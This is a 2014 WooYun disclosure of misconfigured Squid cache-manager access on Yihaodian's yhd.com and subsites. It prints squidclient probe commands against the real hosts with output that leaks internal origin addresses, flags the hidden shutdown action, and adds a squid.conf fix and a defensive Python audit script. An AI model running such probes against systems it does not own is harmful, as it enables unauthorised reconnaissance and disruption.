WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
2014-12-08: Details have been sent to the vendor and are awaiting vendor handling
2014-12-10: Vendor has confirmed; details disclosed to the vendor only
2014-12-20: Details disclosed to core white hats and experts in the relevant field
2014-12-30: Details disclosed to regular white hats
2015-01-09: Details disclosed to intern white hats
2015-01-22: Details disclosed to the public
Yihaodian (1号店) main site and multiple subsites: a service is improperly configured
The Squid ACL on Yihaodian's main site and multiple subsites is improperly configured, leading to information disclosure; the main site is used as the example.
dodo@dodo:~$ squidclient -h www.yhd.com -p 80 mgr:
HTTP/1.1 200 OK
Server: squid/2.7.STABLE9-YHD0.8.1
Date: Mon, 08 Dec 2014 05:21:20 GMT
Content-Type: text/plain
Expires: Mon, 08 Dec 2014 05:21:20 GMT
X-Cache: MISS from yhd_homepage_4_2_170
X-Cache-Lookup: MISS from yhd_homepage_4_2_170:80
Connection: close

 mem                        Memory Utilization                          public
 cbdata                     Callback Data Registry Contents             public
 events                     Event Queue                                 public
 squidaio_counts            Async IO Function Counters                  public
 coss                       COSS Stats                                  public
 diskd                      DISKD Stats                                 public
 config                     Current Squid Configuration                 hidden
 ipcache                    IP Cache Stats and Contents                 public
 fqdncache                  FQDN Cache Stats and Contents               public
 idns                       Internal DNS Statistics                     public
 url_rewriter               URL Rewriter Stats                          public
 store_rewriter             URL Rewriter Stats                          public
 external_acl               External ACL stats                          public
 http_headers               HTTP Header Statistics                      public
 menu                       This Cachemanager Menu                      public
 ## note this! ##
 shutdown                   Shut Down the Squid Process                 hidden
 reconfigure                Reconfigure the Squid Process               hidden
 offline_toggle             Toggle offline_mode setting                 hidden
 info                       General Runtime Information                 public
 filedescriptors            Process Filedescriptor Allocation           public
 objects                    All Cache Objects                           public
 vm_objects                 In-Memory and In-Transit Objects            public
 openfd_objects             Objects with Swapout files open             public
 pending_objects            Objects being retreived from the network    public
 client_objects             Objects being sent to clients               public
 io                         Server-side network read() size histograms  public
 counters                   Traffic and Resource Counters               public
 peer_select                Peer Selection Algorithms                   public
 digest_stats               Cache Digest and ICP blob                   public
 5min                       5 Minute Average of Counters                public
 60min                      60 Minute Average of Counters               public
 utilization                Cache Utilization                           public
 histograms                 Full Histogram Counts                       public
 active_requests            Client-side Active Requests                 public
 store_digest               Store Digest                                public
 storedir                   Store Directory Stats                       public
 store_check_cachable_stats storeCheckCachable() Stats                  public
 store_io                   Store IO Interface Stats                    public
 pconn                      Persistent Connection Utilization Histograms public
 refresh                    Refresh Algorithm Statistics                public
 delay                      Delay Pool Levels                           public
 forward                    Request Forwarding Statistics               public
 client_list                Cache Client List                           public
 asndb                      AS Number Database                          public
 server_list                Peer Cache Statistics                       public
 non_peers                  List of Unknown sites sending ICP messages  public
Sites with the same problem also include: s.yhd.com, cms.yhd.com, t.yhd.com, 3c.yhd.com, food.yhd.com, channel.yhd.com, baobao.yhd.com
~$ squidclient -h www.yhd.com -p 80 mgr:server_list
HTTP/1.1 200 OK
Server: squid/2.7.STABLE9-YHD0.8.1
Date: Mon, 08 Dec 2014 05:22:45 GMT
Content-Type: text/plain
Expires: Mon, 08 Dec 2014 05:22:45 GMT
X-Cache: MISS from yhd_homepage_4_1_166
X-Cache-Lookup: MISS from yhd_homepage_4_1_166:80
Connection: close

Parent : www
Host : 10.x.x.191/80/0
Flags : no-query round-robin originserver
Address[0] : 10.x.x.191
Status : Up
AVG RTT : 0 msec
OPEN CONNS : 0
FETCHES : 24920018 0%
IGNORED : 0 0%
Last failed connect() at: 07/Dec/2014:02:30:01 +0800
DOMAIN LIST: www.yhd.com
keep-alive ratio: 0%

Parent : xxxxxxxxxxxxxxxx
Host : 10.x.x.191/80/0
Flags : no-query round-robin originserver
Address[0] : 10.x.x.191
Status : Up
AVG RTT : 0 msec
OPEN CONNS : 2
FETCHES : 24930195 0%
IGNORED : 0 0%
Last failed connect() at: 08/Dec/2014:10:04:23 +0800
DOMAIN LIST: www.yhd.com
keep-alive ratio: 0%

Parent : xxxxxxxxxx
Host : 10.x.x.191/80/0
Flags : no-query round-robin originserver
Address[0] : 10.x.x.191
Status : Up
AVG RTT : 0 msec
OPEN CONNS : 2
FETCHES : 24932905 0%
IGNORED : 0 0%
Last failed connect() at: 08/Dec/2014:09:10:01 +0800
DOMAIN LIST: www.yhd.com
keep-alive ratio: 0%

Parent : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Host : 10.x.x.192/80/0
Flags : no-query round-robin originserver
Address[0] : 10.x.x.192
Status : Up
AVG RTT : 0 msec
OPEN CONNS : 0
FETCHES : 1006 0%
IGNORED : 0 0%
DOMAIN LIST: xxxxxxxx.yhd.com
keep-alive ratio: 0%

Parent : xxxxxxxxxxxxx1
Host : 10.x.x.192/80/0
Flags : no-query round-robin originserver
Address[0] : 10.x.x.192
Status : Up
AVG RTT : 0 msec
OPEN CONNS : 0
FETCHES : 2410 0%
IGNORED : 0 0%
DOMAIN LIST: xxxxxxxxxx
keep-alive ratio: 0%

Parent : x
Host : 10.x.x.192/80/0
Flags : no-query round-robin originserver
Address[0] : 10.x.x.192
Status : Up
AVG RTT : 0 msec
OPEN CONNS : 0
FETCHES : 6148 0%
IGNORED : 0 0%
Last failed connect() at: 20/Nov/2014:10:43:27 +0800
DOMAIN LIST: xxxxxxxxxxxxxx
keep-alive ratio: 0%
Suggested fix (squid.conf):
cachemgr_passwd password_here all
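The menu above tells a defender two things: every action marked "public" answers to anyone who can send a cache_object request to the proxy (which is how server_list leaked the internal 10.x.x.x origin addresses), and actions marked "hidden" are ones Squid will only serve once a cachemgr_passwd is configured for them. A password line on its own therefore does not close the network exposure; the manager needs an http_access rule limiting it to localhost, with the password as a second layer. The following audit helper is an added example and not part of the WooYun report or of Squid: it parses a constructed menu sample modelled on the one above, lists what is reachable without a password, and checks whether a squid.conf fragment (the report's one-line fix versus an assumed Squid 2.7 hardened fragment, where the manager ACL still has to be declared explicitly) actually restricts manager access. The ACL names, the sample menu and the placeholder password are all constructed for the example.

```python
"""Squid cache manager exposure audit (added example, not from the report).

Third column of the `mgr:menu` output is the protection level:
  public    - answers to anyone who can reach the manager, no password
  hidden    - needs a cachemgr_passwd that is not configured yet
  protected - needs the configured cachemgr_passwd
  disabled  - never answers
"""
import re

# Constructed sample, modelled on (and trimmed from) the menu in the report.
SAMPLE_MENU = """\
 mem                    Memory Utilization                      public
 config                 Current Squid Configuration             hidden
 menu                   This Cachemanager Menu                  public
 shutdown               Shut Down the Squid Process             hidden
 reconfigure            Reconfigure the Squid Process           hidden
 info                   General Runtime Information             public
 client_list            Cache Client List                       public
 server_list            Peer Cache Statistics                   public
"""

# The report's suggested fix on its own: a password, but no network restriction.
PASSWORD_ONLY_CONF = "cachemgr_passwd password_here all\n"

# Assumed hardened fragment for Squid 2.7 (manager ACL declared explicitly;
# newer Squid predefines it).  CHANGE_ME is a placeholder, not a real value.
HARDENED_CONF = """\
acl manager proto cache_object
acl localhost src 127.0.0.1/32
http_access allow manager localhost
http_access deny manager
# never allow remote shutdown/reconfigure even with a password
cachemgr_passwd disable shutdown reconfigure offline_toggle
cachemgr_passwd CHANGE_ME all
"""

# Actions whose output reveals internal topology, addresses or configuration.
DISCLOSURE_ACTIONS = {"server_list", "client_list", "config", "info",
                      "ipcache", "fqdncache", "non_peers"}
# Actions that change the proxy's state rather than report on it.
CONTROL_ACTIONS = {"shutdown", "reconfigure", "offline_toggle"}

MENU_LINE = re.compile(r"^\s*(\S+)\s+(.*?)\s+(public|hidden|protected|disabled)\s*$")


def parse_menu(text):
    """Return {action: protection_level} from cache manager menu text."""
    actions = {}
    for line in text.splitlines():
        m = MENU_LINE.match(line)
        if m:
            actions[m.group(1)] = m.group(3)
    return actions


def network_reachable(text):
    """Actions that answer with no password at all (level 'public')."""
    return sorted(a for a, p in parse_menu(text).items() if p == "public")


def audit_menu(text):
    """Findings a defender cares about, as (action, level, note) tuples."""
    findings = []
    for action, level in sorted(parse_menu(text).items()):
        if level == "public" and action in DISCLOSURE_ACTIONS:
            findings.append((action, level,
                             "answers without a password and discloses internal details"))
        elif level in ("hidden", "protected") and action in (DISCLOSURE_ACTIONS | CONTROL_ACTIONS):
            findings.append((action, level,
                             "becomes usable over the network as soon as a cachemgr_passwd "
                             "is set; restrict the manager with http_access instead"))
    return findings


def manager_restricted(conf_text):
    """Heuristic: True if every http_access rule allowing 'manager' also
    requires 'localhost' and a rule denying 'manager' exists."""
    rules = []
    for line in conf_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 3 and parts[0] == "http_access" and "manager" in parts[2:]:
            rules.append((parts[1], set(parts[2:])))
    seen_deny = False
    for verb, acls in rules:
        if verb == "allow" and "localhost" not in acls:
            return False
        if verb == "deny" and "manager" in acls and acls <= {"manager", "!localhost"}:
            seen_deny = True
    return seen_deny


if __name__ == "__main__":
    print("reachable without password:", network_reachable(SAMPLE_MENU))
    for action, level, note in audit_menu(SAMPLE_MENU):
        print(f"  {action:<12} {level:<9} {note}")
    print("password-only fix restricts manager:", manager_restricted(PASSWORD_ONLY_CONF))
    print("hardened fragment restricts manager:", manager_restricted(HARDENED_CONF))
```

To run it against a live proxy you own, paste the body of `squidclient -h <proxy> -p <port> mgr:menu` in place of SAMPLE_MENU and your squid.conf in place of the fragments; the config check is deliberately simple (it does not evaluate a trailing `http_access deny all`), so treat a True result as a prompt to re-read the rule order, not as proof.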
Severity: Low
Vulnerability Rank: 3
Confirmed: 2014-12-10 10:23
Thanks
None yet